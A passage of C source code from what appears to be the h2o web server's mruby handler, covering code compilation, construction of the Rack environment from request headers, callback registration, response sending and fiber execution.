mrb_obj_value(mrb->exc)))); } abort(); } } mrb_value h2o_mruby_to_str(mrb_state *mrb, mrb_value v) { if (!mrb_string_p(v)) H2O_MRUBY_EXEC_GUARD({ v = mrb_str_to_str(mrb, v); }); return v; } mrb_value h2o_mruby_eval_expr(mrb_state *mrb, const char *expr) { return mrb_funcall(mrb, mrb_top_self(mrb), "eval", 1, mrb_str_new_cstr(mrb, expr)); } mrb_value h2o_mruby_eval_expr_location(mrb_state *mrb, const char *expr, const char *path, const int lineno) { return mrb_funcall(mrb, mrb_top_self(mrb), "eval", 4, mrb_str_new_cstr(mrb, expr), mrb_nil_value(), mrb_str_new_cstr(mrb, path), mrb_fixnum_value(lineno)); } void h2o_mruby_define_callback(mrb_state *mrb, const char *name, h2o_mruby_callback_t callback) { h2o_mruby_shared_context_t *shared_ctx = mrb->ud; h2o_vector_reserve(NULL, &shared_ctx->callbacks, shared_ctx->callbacks.size + 1); shared_ctx->callbacks.entries[shared_ctx->callbacks.size++] = callback; mrb_value args[2]; args[0] = mrb_str_new_cstr(mrb, name); args[1] = mrb_fixnum_value(-(int)shared_ctx->callbacks.size); mrb_funcall_argv(mrb, mrb_top_self(mrb), mrb_intern_lit(mrb, "_h2o_define_callback"), 2, args); if (mrb->exc != NULL) { fprintf(stderr, "failed to define mruby function: %s\n", name); h2o_mruby_assert(mrb); } } mrb_value h2o_mruby_create_data_instance(mrb_state *mrb, mrb_value class_obj, void *ptr, const mrb_data_type *type) { struct RClass *klass = mrb_class_ptr(class_obj); struct RData *data = mrb_data_object_alloc(mrb, klass, ptr, type); return mrb_obj_value(data); } struct RProc *h2o_mruby_compile_code(mrb_state *mrb, h2o_mruby_config_vars_t *config, char *errbuf) { mrbc_context *cxt; struct mrb_parser_state *parser; struct RProc *proc = NULL; /* parse */ if ((cxt = mrbc_context_new(mrb)) == NULL) { fprintf(stderr, "%s: no memory\n", H2O_MRUBY_MODULE_NAME); abort(); } if (config->path != NULL) mrbc_filename(mrb, cxt, config->path); cxt->capture_errors = 1; cxt->lineno = config->lineno; if ((parser = mrb_parse_nstring(mrb, config->source.base, (int)config->source.len, cxt)) == NULL) { fprintf(stderr, "%s: no memory\n", H2O_MRUBY_MODULE_NAME); abort(); } /* return erro if errbuf is supplied, or abort */ if (parser->nerr != 0) { if (errbuf == NULL) { fprintf(stderr, "%s: internal error (unexpected state)\n", H2O_MRUBY_MODULE_NAME); abort(); } snprintf(errbuf, 256, "line %d:%s", parser->error_buffer[0].lineno, parser->error_buffer[0].message); strcat(errbuf, "\n\n"); if (h2o_str_at_position(errbuf + strlen(errbuf), config->source.base, config->source.len, parser->error_buffer[0].lineno - config->lineno + 1, parser->error_buffer[0].column) != 0) { /* remove trailing "\n\n" in case we failed to append the source code at the error location */ errbuf[strlen(errbuf) - 2] = '\0'; } goto Exit; } /* generate code */ if ((proc = mrb_generate_code(mrb, parser)) == NULL) { fprintf(stderr, "%s: internal error (mrb_generate_code failed)\n", H2O_MRUBY_MODULE_NAME); abort(); } Exit: mrb_parser_free(parser); mrbc_context_free(mrb, cxt); return proc; } static h2o_iovec_t convert_header_name_to_env(h2o_mem_pool_t *pool, const char *name, size_t len) { #define KEY_PREFIX "HTTP_" #define KEY_PREFIX_LEN (sizeof(KEY_PREFIX) - 1) h2o_iovec_t ret; ret.len = len + KEY_PREFIX_LEN; ret.base = h2o_mem_alloc_pool(pool, ret.len); memcpy(ret.base, KEY_PREFIX, KEY_PREFIX_LEN); char *d = ret.base + KEY_PREFIX_LEN; for (; len != 0; ++name, --len) *d++ = *name == '-' ? '_' : h2o_toupper(*name); return ret; #undef KEY_PREFIX #undef KEY_PREFIX_LEN } static mrb_value build_constants(mrb_state *mrb, const char *server_name, size_t server_name_len) { mrb_value ary = mrb_ary_new_capa(mrb, H2O_MRUBY_NUM_CONSTANTS); mrb_int i; int gc_arena = mrb_gc_arena_save(mrb); { h2o_mem_pool_t pool; h2o_mem_init_pool(&pool); for (i = 0; i != H2O_MAX_TOKENS; ++i) { const h2o_token_t *token = h2o__tokens + i; mrb_value lit = mrb_nil_value(); if (token == H2O_TOKEN_CONTENT_TYPE) { lit = mrb_str_new_lit(mrb, "CONTENT_TYPE"); } else if (token->buf.len != 0) { h2o_iovec_t n = convert_header_name_to_env(&pool, token->buf.base, token->buf.len); lit = h2o_mruby_new_str(mrb, n.base, n.len); } if (mrb_string_p(lit)) { FREEZE_STRING(lit); mrb_ary_set(mrb, ary, i, lit); } } h2o_mem_clear_pool(&pool); } #define SET_STRING(idx, value) \ do { \ mrb_value lit = (value); \ FREEZE_STRING(lit); \ mrb_ary_set(mrb, ary, idx, lit); \ } while (0) #define SET_LITERAL(idx, str) SET_STRING(idx, mrb_str_new_lit(mrb, str)) SET_LITERAL(H2O_MRUBY_LIT_REQUEST_METHOD, "REQUEST_METHOD"); SET_LITERAL(H2O_MRUBY_LIT_SCRIPT_NAME, "SCRIPT_NAME"); SET_LITERAL(H2O_MRUBY_LIT_PATH_INFO, "PATH_INFO"); SET_LITERAL(H2O_MRUBY_LIT_QUERY_STRING, "QUERY_STRING"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_NAME, "SERVER_NAME"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_ADDR, "SERVER_ADDR"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_PORT, "SERVER_PORT"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_PROTOCOL, "SERVER_PROTOCOL"); SET_LITERAL(H2O_MRUBY_LIT_CONTENT_LENGTH, "CONTENT_LENGTH"); SET_LITERAL(H2O_MRUBY_LIT_REMOTE_ADDR, "REMOTE_ADDR"); SET_LITERAL(H2O_MRUBY_LIT_REMOTE_PORT, "REMOTE_PORT"); SET_LITERAL(H2O_MRUBY_LIT_REMOTE_USER, "REMOTE_USER"); SET_LITERAL(H2O_MRUBY_LIT_RACK_URL_SCHEME, "rack.url_scheme"); SET_LITERAL(H2O_MRUBY_LIT_RACK_MULTITHREAD, "rack.multithread"); SET_LITERAL(H2O_MRUBY_LIT_RACK_MULTIPROCESS, "rack.multiprocess"); SET_LITERAL(H2O_MRUBY_LIT_RACK_RUN_ONCE, "rack.run_once"); SET_LITERAL(H2O_MRUBY_LIT_RACK_HIJACK_, "rack.hijack?"); SET_LITERAL(H2O_MRUBY_LIT_RACK_INPUT, "rack.input"); SET_LITERAL(H2O_MRUBY_LIT_RACK_ERRORS, "rack.errors"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_SOFTWARE, "SERVER_SOFTWARE"); SET_STRING(H2O_MRUBY_LIT_SERVER_SOFTWARE_VALUE, h2o_mruby_new_str(mrb, server_name, server_name_len)); #undef SET_LITERAL #undef SET_STRING h2o_mruby_eval_expr_location(mrb, H2O_MRUBY_CODE_CORE, "(h2o)lib/handler/mruby/embedded/core.rb", 1); h2o_mruby_assert(mrb); mrb_ary_set(mrb, ary, H2O_MRUBY_PROC_EACH_TO_ARRAY, mrb_funcall(mrb, mrb_obj_value(mrb->kernel_module), "_h2o_proc_each_to_array", 0)); h2o_mruby_assert(mrb); mrb_gc_arena_restore(mrb, gc_arena); return ary; } static void handle_exception(h2o_mruby_context_t *ctx, h2o_mruby_generator_t *generator) { mrb_state *mrb = ctx->shared->mrb; assert(mrb->exc != NULL); if (generator == NULL) { fprintf(stderr, "mruby raised: %s\n", RSTRING_PTR(mrb_inspect(mrb, mrb_obj_value(mrb->exc)))); } else { assert(generator->req != NULL); h2o_req_log_error(generator->req, H2O_MRUBY_MODULE_NAME, "mruby raised: %s\n", RSTRING_PTR(mrb_inspect(mrb, mrb_obj_value(mrb->exc)))); if (generator->req->_generator == NULL) { h2o_send_error_500(generator->req, "Internal Server Error", "Internal Server Error", 0); } else { h2o_mruby_send_chunked_close(generator); } } mrb->exc = NULL; } mrb_value send_error_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { mrb_state *mrb = ctx->shared->mrb; mrb->exc = mrb_obj_ptr(mrb_ary_entry(args, 0)); h2o_mruby_generator_t *generator = h2o_mruby_get_generator(mrb, mrb_ary_entry(args, 1)); handle_exception(ctx, generator); return mrb_nil_value(); } mrb_value block_request_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { mrb_state *mrb = ctx->shared->mrb; mrb_value blocking_req = mrb_ary_new_capa(mrb, 2); mrb_ary_set(mrb, blocking_req, 0, ctx->proc); mrb_ary_set(mrb, blocking_req, 1, input); mrb_ary_push(mrb, ctx->blocking_reqs, blocking_req); return mrb_nil_value(); } mrb_value run_blocking_requests_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { mrb_state *mrb = ctx->shared->mrb; mrb_value exc = mrb_ary_entry(args, 0); if (!mrb_nil_p(exc)) { mrb->exc = mrb_obj_ptr(exc); handle_exception(ctx, NULL); } mrb_int i; mrb_int len = RARRAY_LEN(ctx->blocking_reqs); for (i = 0; i != len; ++i) { mrb_value blocking_req = mrb_ary_entry(ctx->blocking_reqs, i); mrb_value blocking_req_resumer = mrb_ary_entry(blocking_req, 0); mrb_value blocking_req_input = mrb_ary_entry(blocking_req, 1); h2o_mruby_run_fiber(ctx, blocking_req_resumer, blocking_req_input, NULL); } mrb_ary_clear(mrb, ctx->blocking_reqs); return mrb_nil_value(); } mrb_value run_child_fiber_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { mrb_state *mrb = ctx->shared->mrb; mrb_value resumer = mrb_ary_entry(args, 0); /* * swap receiver to run child fiber immediately, while storing main fiber resumer * which will be called after the child fiber is yielded */ mrb_ary_push(mrb, ctx->resumers, *receiver); *receiver = resumer; *run_again = 1; return mrb_nil_value(); } mrb_value finish_child_fiber_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { /* do nothing */ return mrb_nil_value(); } static h2o_mruby_shared_context_t *create_shared_context(h2o_context_t *ctx) { /* init mruby in every thread */ h2o_mruby_shared_context_t *shared_ctx = h2o_mem_alloc(sizeof(*shared_ctx)); if ((shared_ctx->mrb = mrb_open()) == NULL) { fprintf(stderr, "%s: no memory\n", H2O_MRUBY_MODULE_NAME); abort(); } shared_ctx->mrb->ud = shared_ctx; shared_ctx->ctx = ctx; shared_ctx->current_context = NULL; shared_ctx->callbacks = (h2o_mruby_callbacks_t){NULL}; h2o_mruby_setup_globals(shared_ctx->mrb); shared_ctx->constants = build_constants(shared_ctx->mrb, ctx->globalconf->server_name.base, ctx->globalconf->server_name.len); shared_ctx->symbols.sym_call = mrb_intern_lit(shared_ctx->mrb, "call"); shared_ctx->symbols.sym_close = mrb_intern_lit(shared_ctx->mrb, "close"); shared_ctx->symbols.sym_method = mrb_intern_lit(shared_ctx->mrb, "method"); shared_ctx->symbols.sym_headers = mrb_intern_lit(shared_ctx->mrb, "headers"); shared_ctx->symbols.sym_body = mrb_intern_lit(shared_ctx->mrb, "body"); shared_ctx->symbols.sym_async = mrb_intern_lit(shared_ctx->mrb, "async"); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__send_error", send_error_callback); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__block_request", block_request_callback); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__run_blocking_requests", run_blocking_requests_callback); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__run_child_fiber", run_child_fiber_callback); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__finish_child_fiber", finish_child_fiber_callback); h2o_mruby_send_chunked_init_context(shared_ctx); h2o_mruby_http_request_init_context(shared_ctx); h2o_mruby_sleep_init_context(shared_ctx); h2o_mruby_channel_init_context(shared_ctx); struct RClass *module = mrb_define_module(shared_ctx->mrb, "H2O"); struct RClass *generator_klass = mrb_define_class_under(shared_ctx->mrb, module, "Generator", shared_ctx->mrb->object_class); mrb_ary_set(shared_ctx->mrb, shared_ctx->constants, H2O_MRUBY_GENERATOR_CLASS, mrb_obj_value(generator_klass)); return shared_ctx; } static void dispose_shared_context(void *data) { if (data == NULL) return; h2o_mruby_shared_context_t *shared_ctx = (h2o_mruby_shared_context_t *)data; mrb_close(shared_ctx->mrb); free(shared_ctx); } static h2o_mruby_shared_context_t *get_shared_context(h2o_context_t *ctx) { static size_t key = SIZE_MAX; void **data = h2o_context_get_storage(ctx, &key, dispose_shared_context); if (*data == NULL) { *data = create_shared_context(ctx); } return *data; } mrb_value prepare_fibers(h2o_mruby_context_t *ctx) { mrb_state *mrb = ctx->shared->mrb; h2o_mruby_config_vars_t config = ctx->handler->config; mrb_value conf = mrb_hash_new_capa(mrb, 3); mrb_hash_set(mrb, conf, mrb_symbol_value(mrb_intern_lit(mrb, "code")), h2o_mruby_new_str(mrb, config.source.base, config.source.len)); mrb_hash_set(mrb, conf, mrb_symbol_value(mrb_intern_lit(mrb, "file")), h2o_mruby_new_str(mrb, config.path, strlen(config.path))); mrb_hash_set(mrb, conf, mrb_symbol_value(mrb_intern_lit(mrb, "line")), mrb_fixnum_value(config.lineno)); /* run code and generate handler */ mrb_value result = mrb_funcall(mrb, mrb_obj_value(mrb->kernel_module), "_h2o_prepare_app", 1, conf); h2o_mruby_assert(mrb); assert(mrb_array_p(result)); return result; } static void on_context_init(h2o_handler_t *_handler, h2o_context_t *ctx) { h2o_mruby_handler_t *handler = (void *)_handler; h2o_mruby_context_t *handler_ctx = h2o_mem_alloc(sizeof(*handler_ctx)); handler_ctx->handler = handler; handler_ctx->shared = get_shared_context(ctx); mrb_state *mrb = handler_ctx->shared->mrb; handler_ctx->blocking_reqs = mrb_ary_new(mrb); handler_ctx->resumers = mrb_ary_new(mrb); /* compile code (must be done for each thread) */ int arena = mrb_gc_arena_save(mrb); mrb_value fibers = prepare_fibers(handler_ctx); assert(mrb_array_p(fibers)); handler_ctx->proc = mrb_ary_entry(fibers, 0); /* run configurator */ mrb_value configurator = mrb_ary_entry(fibers, 1); h2o_mruby_run_fiber(handler_ctx, configurator, mrb_nil_value(), NULL); h2o_mruby_assert(handler_ctx->shared->mrb); mrb_gc_arena_restore(mrb, arena); mrb_gc_protect(mrb, handler_ctx->proc); mrb_gc_protect(mrb, configurator); h2o_context_set_handler_context(ctx, &handler->super, handler_ctx); } static void on_context_dispose(h2o_handler_t *_handler, h2o_context_t *ctx) { h2o_mruby_handler_t *handler = (void *)_handler; h2o_mruby_context_t *handler_ctx = h2o_context_get_handler_context(ctx, &handler->super); if (handler_ctx == NULL) return; free(handler_ctx); } static void on_handler_dispose(h2o_handler_t *_handler) { h2o_mruby_handler_t *handler = (void *)_handler; free(handler->config.source.base); free(handler->config.path); free(handler); } static void stringify_address(h2o_conn_t *conn, socklen_t (*cb)(h2o_conn_t *conn, struct sockaddr *), mrb_state *mrb, mrb_value *host, mrb_value *port) { struct sockaddr_storage ss; socklen_t sslen; char buf[NI_MAXHOST]; *host = mrb_nil_value(); *port = mrb_nil_value(); if ((sslen = cb(conn, (void *)&ss)) == 0) return; size_t l = h2o_socket_getnumerichost((void *)&ss, sslen, buf); if (l != SIZE_MAX) *host = h2o_mruby_new_str(mrb, buf, l); int32_t p = h2o_socket_getport((void *)&ss); if (p != -1) { l = (int)sprintf(buf, "%" PRIu16, (uint16_t)p); *port = h2o_mruby_new_str(mrb, buf, l); } } static void on_rack_input_free(mrb_state *mrb, const char *base, mrb_int len, void *_input_stream) { /* reset ref to input_stream */ mrb_value *input_stream = _input_stream; *input_stream = mrb_nil_value(); } static int build_env_sort_header_cb(const void *_x, const void *_y) { const h2o_header_t *x = *(const h2o_header_t **)_x, *y = *(const h2o_header_t **)_y; if (x->name->len < y->name->len) return -1; if (x->name->len > y->name->len) return 1; if (x->name->base != y->name->base) { int r = memcmp(x->name->base, y->name->base, x->name->len); if (r != 0) return r; } assert(x != y); /* the order of the headers having the same name needs to be retained */ return x < y ? -1 : 1; } static mrb_value build_path_info(mrb_state *mrb, h2o_req_t *req, size_t confpath_len_wo_slash) { if (req->path_normalized.len == confpath_len_wo_slash) return mrb_str_new_lit(mrb, ""); assert(req->path_normalized.len > confpath_len_wo_slash); size_t path_info_start, path_info_end = req->query_at != SIZE_MAX ? req->query_at : req->path.len; if (req->norm_indexes == NULL) { path_info_start = confpath_len_wo_slash; } else if (req->norm_indexes[0] == 0 && confpath_len_wo_slash == 0) { /* path without leading slash */ path_info_start = 0; } else { path_info_start = req->norm_indexes[confpath_len_wo_slash] - 1; } return h2o_mruby_new_str(mrb, req->path.base + path_info_start, path_info_end - path_info_start); } static mrb_value build_env(h2o_mruby_generator_t *generator) { h2o_mruby_shared_context_t *shared = generator->ctx->shared; mrb_state *mrb = shared->mrb; mrb_value env = mrb_hash_new_capa(mrb, 16); char http_version[sizeof("HTTP/1.0")]; size_t http_version_sz; /* environment */ mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_REQUEST_METHOD), h2o_mruby_new_str(mrb, generator->req->method.base, generator->req->method.len)); size_t confpath_len_wo_slash = generator->req->pathconf->path.len; if (generator->req->pathconf->path.base[generator->req->pathconf->path.len - 1] == '/') --confpath_len_wo_slash; assert(confpath_len_wo_slash <= generator->req->path_normalized.len); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SCRIPT_NAME), h2o_mruby_new_str(mrb, generator->req->pathconf->path.base, confpath_len_wo_slash)); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_PATH_INFO), build_path_info(mrb, generator->req, confpath_len_wo_slash)); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_QUERY_STRING), generator->req->query_at != SIZE_MAX ? h2o_mruby_new_str(mrb, generator->req->path.base + generator->req->query_at + 1, generator->req->path.len - (generator->req->query_at + 1)) : mrb_str_new_lit(mrb, "")); mrb_hash_set( mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_NAME), h2o_mruby_new_str(mrb, generator->req->hostconf->authority.host.base, generator->req->hostconf->authority.host.len)); http_version_sz = h2o_stringify_protocol_version(http_version, generator->req->version); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_PROTOCOL), h2o_mruby_new_str(mrb, http_version, http_version_sz)); { mrb_value h, p; stringify_address(generator->req->conn, generator->req->conn->callbacks->get_sockname, mrb, &h, &p); if (!mrb_nil_p(h)) mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_ADDR), h); if (!mrb_nil_p(p)) mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_PORT), p); } mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_TOKEN_HOST - h2o__tokens), h2o_mruby_new_str(mrb, generator->req->authority.base, generator->req->authority.len)); if (generator->req->entity.base != NULL) { char buf[32]; int l = sprintf(buf, "%zu", generator->req->entity.len); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_CONTENT_LENGTH), h2o_mruby_new_str(mrb, buf, l)); generator->rack_input = mrb_input_stream_value(mrb, NULL, 0); mrb_input_stream_set_data(mrb, generator->rack_input, generator->req->entity.base, (mrb_int)generator->req->entity.len, 0, on_rack_input_free, &generator->rack_input); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_INPUT), generator->rack_input); } { mrb_value h, p; stringify_address(generator->req->conn, generator->req->conn->callbacks->get_peername, mrb, &h, &p); if (!mrb_nil_p(h)) mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_REMOTE_ADDR), h); if (!mrb_nil_p(p)) mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_REMOTE_PORT), p); } { size_t i; for (i = 0; i != generator->req->env.size; i += 2) { h2o_iovec_t *name = generator->req->env.entries + i, *value = name + 1; mrb_hash_set(mrb, env, h2o_mruby_new_str(mrb, name->base, name->len), h2o_mruby_new_str(mrb, value->base, value->len)); } } { /* headers */ h2o_header_t **sorted = alloca(sizeof(*sorted) * generator->req->headers.size); size_t i, num_sorted = 0; for (i = 0; i != generator->req->headers.size; ++i) { if (generator->req->headers.entries[i].name == &H2O_TOKEN_TRANSFER_ENCODING->buf) continue; sorted[num_sorted++] = generator->req->headers.entries + i; } qsort(sorted, num_sorted, sizeof(*sorted), build_env_sort_header_cb); h2o_iovec_t *values = alloca(sizeof(*values) * (num_sorted * 2 - 1)); for (i = 0; i != num_sorted; ++i) { /* build flattened value of the header field values that have the same name as sorted[i] */ size_t num_values = 0; values[num_values++] = sorted[i]->value; while (i < num_sorted - 1 && h2o_header_name_is_equal(sorted[i], sorted[i + 1])) { ++i; values[num_values++] = h2o_iovec_init(sorted[i]->name == &H2O_TOKEN_COOKIE->buf ? "; " : ", ", 2); values[num_values++] = sorted[i]->value; } h2o_iovec_t flattened_values = num_values == 1 ? values[0] : h2o_concat_list(&generator->req->pool, values, num_values); /* build mrb_values for name, header, and set them to the hash */ mrb_value n, v = h2o_mruby_new_str(mrb, flattened_values.base, flattened_values.len); if (h2o_iovec_is_token(sorted[i]->name)) { const h2o_token_t *token = H2O_STRUCT_FROM_MEMBER(h2o_token_t, buf, sorted[i]->name); n = mrb_ary_entry(shared->constants, (mrb_int)(token - h2o__tokens)); } else { h2o_iovec_t vec = convert_header_name_to_env(&generator->req->pool, sorted[i]->name->base, sorted[i]->name->len); n = h2o_mruby_new_str(mrb, vec.base, vec.len); } mrb_hash_set(mrb, env, n, v); } } /* rack.* */ /* TBD rack.version? */ mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_URL_SCHEME), h2o_mruby_new_str(mrb, generator->req->scheme->name.base, generator->req->scheme->name.len)); /* we are using shared-none architecture, and therefore declare ourselves as multiprocess */ mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_MULTITHREAD), mrb_false_value()); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_MULTIPROCESS), mrb_true_value()); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_RUN_ONCE), mrb_false_value()); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_HIJACK_), mrb_false_value()); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_ERRORS), mrb_gv_get(mrb, mrb_intern_lit(mrb, "$stderr"))); /* server name */ mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_SOFTWARE), mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_SOFTWARE_VALUE)); return env; } static int handle_response_header(h2o_mruby_shared_context_t *shared_ctx, h2o_iovec_t name, h2o_iovec_t value, void *_req) { h2o_req_t *req = _req; const h2o_token_t *token; static const h2o_iovec_t fallthru_set_prefix = {H2O_STRLIT(FALLTHRU_SET_PREFIX)}; /* convert name to lowercase */ name = h2o_strdup(&req->pool, name.base, name.len); h2o_strtolower(name.base, name.len); if ((token = h2o_lookup_token(name.base, name.len)) != NULL) { if (token->proxy_should_drop_for_res) { /* skip */ } else if (token == H2O_TOKEN_CONTENT_LENGTH) { req->res.content_length = h2o_strtosize(value.base, value.len); } else { value = h2o_strdup(&req->pool, value.base, value.len); if (token == H2O_TOKEN_LINK) { h2o_iovec_t new_value = h2o_push_path_in_link_header(req, value.base, value.len); if (new_value.len) h2o_add_header(&req->pool, &req->res.headers, token, NULL, new_value.base, new_value.len); } else { h2o_add_header(&req->pool, &req->res.headers, token, NULL, value.base, value.len); } } } else if (name.len > fallthru_set_prefix.len && h2o_memis(name.base, fallthru_set_prefix.len, fallthru_set_prefix.base, fallthru_set_prefix.len)) { /* register environment variables (with the name converted to uppercase, and using `_`) */ size_t i; name.base += fallthru_set_prefix.len; name.len -= fallthru_set_prefix.len; for (i = 0; i != name.len; ++i) name.base[i] = name.base[i] == '-' ? '_' : h2o_toupper(name.base[i]); h2o_iovec_t *slot = h2o_req_getenv(req, name.base, name.len, 1); *slot = h2o_strdup(&req->pool, value.base, value.len); } else { value = h2o_strdup(&req->pool, value.base, value.len); h2o_add_header_by_str(&req->pool, &req->res.headers, name.base, name.len, 0, NULL, value.base, value.len); } return 0; } static void clear_rack_input(h2o_mruby_generator_t *generator) { if (!mrb_nil_p(generator->rack_input)) mrb_input_stream_set_data(generator->ctx->shared->mrb, generator->rack_input, NULL, -1, 0, NULL, NULL); } static void on_generator_dispose(void *_generator) { h2o_mruby_generator_t *generator = _generator; clear_rack_input(generator); generator->req = NULL; if (!mrb_nil_p(generator->refs.generator)) DATA_PTR(generator->refs.generator) = NULL; if (generator->chunked != NULL) h2o_mruby_send_chunked_dispose(generator); } static int on_req(h2o_handler_t *_handler, h2o_req_t *req) { h2o_mruby_handler_t *handler = (void *)_handler; h2o_mruby_shared_context_t *shared = get_shared_context(req->conn->ctx); int gc_arena = mrb_gc_arena_save(shared->mrb); h2o_mruby_context_t *ctx = h2o_context_get_handler_context(req->conn->ctx, &handler->super); h2o_mruby_generator_t *generator = h2o_mem_alloc_shared(&req->pool, sizeof(*generator), on_generator_dispose); generator->super.proceed = NULL; generator->super.stop = NULL; generator->req = req; generator->ctx = ctx; generator->rack_input = mrb_nil_value(); generator->chunked = NULL; mrb_value env = build_env(generator); mrb_value gen = h2o_mruby_create_data_instance(shared->mrb, mrb_ary_entry(shared->constants, H2O_MRUBY_GENERATOR_CLASS), generator, &generator_type); generator->refs.generator = gen; mrb_value args = mrb_ary_new(shared->mrb); mrb_ary_set(shared->mrb, args, 0, env); mrb_ary_set(shared->mrb, args, 1, gen); int is_delegate = 0; h2o_mruby_run_fiber(ctx, ctx->proc, args, &is_delegate); mrb_gc_arena_restore(shared->mrb, gc_arena); if (is_delegate) return -1; return 0; } static int send_response(h2o_mruby_generator_t *generator, mrb_int status, mrb_value resp, int *is_delegate) { mrb_state *mrb = generator->ctx->shared->mrb; mrb_value body; h2o_iovec_t content = {NULL}; /* set status */ generator->req->res.status = (int)status; /* set headers */ if (h2o_mruby_iterate_headers(generator->ctx->shared, mrb_ary_entry(resp, 1), handle_response_header, generator->req) != 0) { return -1; } /* add date: if it's missing from the response */ if (h2o_find_header(&generator->req->res.headers, H2O_TOKEN_DATE, 0) == -1) h2o_resp_add_date_header(generator->req); /* return without processing body, if status is fallthru */ if (generator->req->res.status == STATUS_FALLTHRU) { if (is_delegate != NULL) *is_delegate = 1; else h2o_delegate_request_deferred(generator->req, &generator->ctx->handler->super); return 0; } /* obtain body */ body = mrb_ary_entry(resp, 2); /* flatten body if possible */ if (mrb_array_p(body)) { mrb_int i, len = RARRAY_LEN(body); /* calculate the length of the output, while at the same time converting the elements of the output array to string */ content.len = 0; for (i = 0; i != len; ++i) { mrb_value e = mrb_ary_entry(body, i); if (!mrb_string_p(e)) { e = h2o_mruby_to_str(mrb, e); if (mrb->exc != NULL) return -1; mrb_ary_set(mrb, body, i, e); } content.len += RSTRING_LEN(e); } /* allocate memory, and copy the response */ char *dst = content.base = h2o_mem_alloc_pool(&generator->req->pool, content.len); for (i = 0; i != len; ++i) { mrb_value e = mrb_ary_entry(body, i); assert(mrb_string_p(e)); memcpy(dst, RSTRING_PTR(e), RSTRING_LEN(e)); dst += RSTRING_LEN(e); } /* reset body to nil, now that we have read all data */ body = mrb_nil_value(); } /* use fiber in case we need to call #each */ if (!mrb_nil_p(body)) { mrb_value receiver = h2o_mruby_send_chunked_init(generator, body); if (mrb->exc != NULL) return -1; if (!mrb_nil_p(receiver)) { mrb_value input = mrb_ary_new_capa(mrb, 2); mrb_ary_set(mrb, input, 0, body); mrb_ary_set(mrb, input, 1, generator->refs.generator); h2o_mruby_run_fiber(generator->ctx, receiver, input, 0); } return 0; } /* send the entire response immediately */ if (status == 101 || status == 204 || status == 304 || h2o_memis(generator->req->input.method.base, generator->req->input.method.len, H2O_STRLIT("HEAD"))) { h2o_start_response(generator->req, &generator->super); h2o_send(generator->req, NULL, 0, H2O_SEND_STATE_FINAL); } else { if (content.len < generator->req->res.content_length) { generator->req->res.content_length = content.len; } else { content.len = generator->req->res.content_length; } h2o_start_response(generator->req, &generator->super); h2o_send(generator->req, &content, 1, H2O_SEND_STATE_FINAL); } return 0; } void h2o_mruby_run_fiber(h2o_mruby_context_t *ctx, mrb_value receiver, mrb_value input, int *is_delegate) { h2o_mruby_context_t *old_ctx = ctx->shared->current_context; ctx->shared->current_context = ctx; mrb_state *mrb = ctx->shared->mrb; mrb_value output; mrb_int status; h2o_mruby_generator_t *generator = NULL; while (1) { /* send input to fiber */ output = mrb_funcall_argv(mrb, receiver, ctx->shared->symbols.sym_call, 1, &input); if (mrb->exc != NULL) goto GotException; if (!mrb_array_p(output)) { mrb->exc = mrb_obj_ptr(mrb_exc_new_str_lit(mrb, E_RUNTIME_ERROR, "rack app did not return an array")); goto GotException; } /* fetch status */ mrb_value v = mrb_to_int(mrb, mrb_ary_entry(output, 0)); if (mrb->exc != NULL) goto GotException; status = mrb_fixnum(v); if (status >= 0) break; receiver = mrb_ary_entry(output, 1); mrb_value args = mrb_ary_entry(output, 2); int run_again = 0; size_t callback_index = -status - 1; if (callback_index >= ctx->shared->callbacks.size) { input = mrb_exc_new_str_lit(mrb, E_RUNTIME_ERROR, "unexpected callback id sent from rack app"); run_again = 1; } else { h2o_mruby_callback_t callback = ctx->shared->callbacks.entries[callback_index]; input = callback(ctx, input, &receiver, args, &run_again); } if (mrb->exc != NULL) goto GotException; if (run_again == 0) { if 